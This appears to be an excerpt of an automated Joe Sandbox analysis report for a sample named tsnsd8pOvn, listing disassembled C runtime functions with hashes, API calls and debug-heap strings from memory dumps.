                                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction ID: 0480fd547939deeccef5ee13115130ab17575cab0bb5fd5beb0d1a90ef485787
                                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction Fuzzy Hash: DD516CB1D40219BBEB11DBE1DC86FEFBBB9FB04B04F100025F909B6180EB755A158BA5
                                APIs
                                Strings
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00403DAC
                                • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00403E21
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00403C70
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00403D0E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: BytesCheck
                                • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                • API String ID: 1653226792-1867057952
                                • Opcode ID: 074ae1e5b77cb788c0b6019ba89fa46f6dabf96651e95b086a777fed40d2212b
                                • Instruction ID: f01789071525d7fba52895d7c30f885225c60b6541f751bd697bd7932a74664b
                                • Opcode Fuzzy Hash: 074ae1e5b77cb788c0b6019ba89fa46f6dabf96651e95b086a777fed40d2212b
                                • Instruction Fuzzy Hash: A1613FB5E001059BDB14CF84D885FBFB7B9AF48305F24812AE515BB3D2D278E986CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _memset$__invalid_parameter
                                • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
                                • API String ID: 2178901135-56445615
                                • Opcode ID: ea38ecfd84dd6f58f1b891a5cc75c8417a1256aed079c0d2a3d71db4306658d8
                                • Instruction ID: ac2bbb3639e1aeb8430258686b8cc6fdcb0ba9222226e01ff3c31d1c8206fc2b
                                • Opcode Fuzzy Hash: ea38ecfd84dd6f58f1b891a5cc75c8417a1256aed079c0d2a3d71db4306658d8
                                • Instruction Fuzzy Hash: E441AC70E05209EBCF24CF68D845BEE7772FB44315F14826AE8242A3C1D37899A1CF5A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invoke_watson_if_oneof__isctype_l_swprintf_s
                                • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 4289034949-3158630120
                                • Opcode ID: 3964933c5a1a17433a191d30ada2bb3c00dfc48e94cceca2a418614246e148db
                                • Instruction ID: 689f5ae641b71c60d5018e6882faa1b8a782721c1095da81214e54a0aa4a26bf
                                • Opcode Fuzzy Hash: 3964933c5a1a17433a191d30ada2bb3c00dfc48e94cceca2a418614246e148db
                                • Instruction Fuzzy Hash: 4E31C1B0A04308DFDB04DBA1D991AADB7B1AF96308F2044AAE6057F2D2D7789A41CB54
                                APIs
                                • __set_error_mode.LIBCMTD ref: 0040D848
                                • __set_error_mode.LIBCMTD ref: 0040D857
                                • GetStdHandle.KERNEL32(000000F4), ref: 0040D86E
                                • _strlen.LIBCMT ref: 0040D894
                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040D8AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __set_error_mode$FileHandleWrite_strlen
                                • String ID: jjj$t/j
                                • API String ID: 1121076223-194299851
                                • Opcode ID: 294951e0b26baab266e2b87d3635214bd686c1ba514a58c0dc9a0d43ada468af
                                • Instruction ID: ca8227458c45a6c4e3351c8a8b6438efdd614145478f24c06b97233ce88e9426
                                • Opcode Fuzzy Hash: 294951e0b26baab266e2b87d3635214bd686c1ba514a58c0dc9a0d43ada468af
                                • Instruction Fuzzy Hash: 0621B671E00208EBEB24EFC4E985BAD3770BB54314F20817AE425662D1E3799F59DA4A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction ID: 72751cdf7d93f1fd42e82e8c5ff94951e3cd325bc4bf8f1fc81f6a52b789ccc9
                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction Fuzzy Hash: 8B519FB1E50349AAEF11DFE1DD46FEEBBB9EB04704F100025F915B6180D7B5AA058BA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction ID: 6b86f23302bf7ba322934a602d736be9eff00a95366d40080c48abee4a0d10e2
                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction Fuzzy Hash: 90516F71E50309BADF21DFE1DD46FEEBBB9EB04704F100129F915B6184EB74AA058BA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __getbuf__isatty__write
                                • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c$rjA
                                • API String ID: 2861569966-1870947407
                                • Opcode ID: c58e6d9aada3deb528eb29a0814bc9aa6163b20ee8f4833c7b858b037e2ac0e8
                                • Instruction ID: 845664154f78804b0a9a65fcfd3eb53ad15e2a98ea23fabc88bdd8a880781249
                                • Opcode Fuzzy Hash: c58e6d9aada3deb528eb29a0814bc9aa6163b20ee8f4833c7b858b037e2ac0e8
                                • Instruction Fuzzy Hash: 3451EB78A00208EFDB14CF95C491AADFBB2FF88324F148299E8456B395D634EA81CF44
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__mbtowc_l__un_inc
                                • String ID: ${
                                • API String ID: 579247601-4046706400
                                • Opcode ID: 5ad2a11c46a8d9bea455ed31c28d4367eb044bd6644287e937aaff8845a69666
                                • Instruction ID: fd90a13dd3330c8d304184b2b1228de7f7ab55ab7b9f2c9761ab5b6ac8758c94
                                • Opcode Fuzzy Hash: 5ad2a11c46a8d9bea455ed31c28d4367eb044bd6644287e937aaff8845a69666
                                • Instruction Fuzzy Hash: A441B4B0D05259DBCF24CBA5D8446EEB771AF45304F14C1BFE46977286DA385A84CF09
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: '$0$9
                                • API String ID: 3120068967-269856862
                                • Opcode ID: bdf43f7ed149b6ec473913d7eef71a0b0f9cc436f89fb9127b4bd16d7bf4e21b
                                • Instruction ID: fb47cbb1010d1bcfcdef8a3bc9faf090f85feb6c2187c58d22a889562dabb553
                                • Opcode Fuzzy Hash: bdf43f7ed149b6ec473913d7eef71a0b0f9cc436f89fb9127b4bd16d7bf4e21b
                                • Instruction Fuzzy Hash: FE41D3B1D19229DFEB24CF58C889BEEBBB5BB44304F14859AE448A7340C7389E85CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__hextodec__un_inc_isdigit_isxdigit
                                • String ID: 0$p
                                • API String ID: 500523077-2059906072
                                • Opcode ID: 56445b848237fbc14aa49cb22c206fa3f65ab3cbc6ddd945d71c5786a0529b7a
                                • Instruction ID: 744359d15ed9300e332e6c9bf2b747596e5d87ce5404043883dfa97e3472724b
                                • Opcode Fuzzy Hash: 56445b848237fbc14aa49cb22c206fa3f65ab3cbc6ddd945d71c5786a0529b7a
                                • Instruction Fuzzy Hash: 3B415EB4D042698ACF24CF65C9543EEBBB1AF45308F1481BED49976382DA395A82CF49
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 3534693527-0
                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction ID: 60b025a350fa01740e83d3f17e2e91a996928935ba553d3499a73d6d0828d97c
                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction Fuzzy Hash: F031E8B2931336EBDB226BE49C00BAF67959F15B64F10C615ED04EB2DCDB748540CAA1
                                APIs
                                • __getptd_noexit.LIBCMT ref: 022D66DD
                                  • Part of subcall function 022359BF: __calloc_crt.LIBCMT ref: 022359E2
                                  • Part of subcall function 022359BF: __initptd.LIBCMT ref: 02235A04
                                • __calloc_crt.LIBCMT ref: 022D6700
                                • __get_sys_err_msg.LIBCMT ref: 022D671E
                                • __invoke_watson.LIBCMT ref: 022D673B
                                • __get_sys_err_msg.LIBCMT ref: 022D676D
                                • __invoke_watson.LIBCMT ref: 022D678B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                • String ID:
                                • API String ID: 4066021419-0
                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction ID: 195beceb2ab2ac870eacc398127ff3e968c70f5bb395892c10662083fa637d92
                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction Fuzzy Hash: 6E11C47162171A6BFB227EE5AC40BFA739DDF04760F000466FD08A6648E765D9008AE4
                                APIs
                                • ___initconout.LIBCMTD ref: 0041E144
                                  • Part of subcall function 0041EB10: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,?,0041E149), ref: 0041EB29
                                • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0041E1C9
                                • WideCharToMultiByte.KERNEL32(00000000), ref: 0041E1D0
                                • WriteConsoleA.KERNEL32(FFFFFFFE,00000000,?,?,00000000), ref: 0041E1F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
                                • String ID:
                                • API String ID: 3432720595-0
                                • Opcode ID: 538d545bf6bf0936f1a4d494139258e950b8c1e010eb3c2ea3f4267c6b697435
                                • Instruction ID: 7772987f7334eede2e3b58f7a0d8b08be04c93e2115abb190e2c1dc353fab464
                                • Opcode Fuzzy Hash: 538d545bf6bf0936f1a4d494139258e950b8c1e010eb3c2ea3f4267c6b697435
                                • Instruction Fuzzy Hash: 23219138600204EBEB30CF51DC49FFA37A8AB44310F90067AFE15962D0D7B85982DB5E
                                APIs
                                Strings
                                • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 0040917A
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 00409186
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __getbuf__isatty__write
                                • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
                                • API String ID: 2861569966-4070537404
                                • Opcode ID: dc56555a7844053b0f0488185723e084d865ebb8d8401604b502bbe902f04c55
                                • Instruction ID: 5262c2636aaa671c650dce6d9efb5dd2f16d86043ce79ddb86740b636de742cb
                                • Opcode Fuzzy Hash: dc56555a7844053b0f0488185723e084d865ebb8d8401604b502bbe902f04c55
                                • Instruction Fuzzy Hash: 2951F974A00209EFDB04CF94C495AADFBB1FF88324F14C299E8496B396D635EE81CB44
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 0$9
                                • API String ID: 3120068967-1975997740
                                • Opcode ID: 1c2ceb2e68c1d414dff75780ba37aeb2ffc466b7c673de627fc847d56e9b4dda
                                • Instruction ID: 0c41976f65c194e9d187402291815389253d7742efd3347fb4565a4b3028f553
                                • Opcode Fuzzy Hash: 1c2ceb2e68c1d414dff75780ba37aeb2ffc466b7c673de627fc847d56e9b4dda
                                • Instruction Fuzzy Hash: B041D5B1D19229DFEB24CF58C889BEEBBB5BB45304F14859AE448A7340C7389E85CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: '$9
                                • API String ID: 3120068967-1823400153
                                • Opcode ID: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction ID: 0d3fb9e487f312781bf86d9b30c47737207e3ed2bb2d7c00a30fc94b7fc92100
                                • Opcode Fuzzy Hash: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction Fuzzy Hash: 5241F7B1E5012ADFDB24CF58C941BAEB7B5FF85314F1040AAE248A7282D7785E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: '$9
                                • API String ID: 3120068967-1823400153
                                • Opcode ID: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction ID: 66eee1d777a0329f9ee77f2eb8d4fe152f1a1981c639fcd27a1c1317939d7d61
                                • Opcode Fuzzy Hash: bce90c7eafdefbc38914aefb9a9e3028759f34e8b4fa80dba52c61ab6838831a
                                • Instruction Fuzzy Hash: 8B41E5B1A102299FDB24CF58C841BAFB7B5FF85314F1040A99258BB281D7785E85CF9E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __hextodec__inc_isxdigit
                                • String ID: +$p
                                • API String ID: 3003077261-1790238857
                                • Opcode ID: 14023a0cd0d9e14a6f167f4708e1afb7d0dce05a49e604fb065495f776a2b719
                                • Instruction ID: fe9767e94a96ecfa69cfbcae28d76d248b1c7a5ef3f1c5fa3c9869e00a487168
                                • Opcode Fuzzy Hash: 14023a0cd0d9e14a6f167f4708e1afb7d0dce05a49e604fb065495f776a2b719
                                • Instruction Fuzzy Hash: 303170B0D042598ACF25CF65C9543EEBB71AF45308F1441FFC48576382DA395A81CF49
                                APIs
                                Strings
                                Memory Dump Source
